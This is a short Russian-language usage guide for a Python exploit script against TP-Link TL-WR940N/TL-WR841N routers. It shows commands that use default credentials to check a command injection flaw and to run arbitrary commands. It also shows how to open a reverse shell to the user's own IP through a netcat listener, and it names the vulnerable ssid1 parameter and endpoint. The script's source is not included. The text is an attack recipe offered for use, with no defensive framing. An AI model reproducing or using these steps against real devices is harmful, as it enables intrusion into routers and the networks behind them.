
Эксплоит на Python для уязвимости внедрения команд в TP-Link TL-WR940N/TL-WR841N
Базовая проверка уязвимости:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
Выполнение произвольной команды:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "ваша_команда_здесь"
Реверс-шелл (предварительно запустите слушатель с помощью nc -lvnp 4444):
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost ВАШ_IP --lport 4444
Важные примечания:
Уязвимость существует из-за некорректной санитизации входных данных в параметре ssid1 конечной точки /userRpm/WlanNetworkRpm.htm, что позволяет внедрять команды через специально сформированные запросы.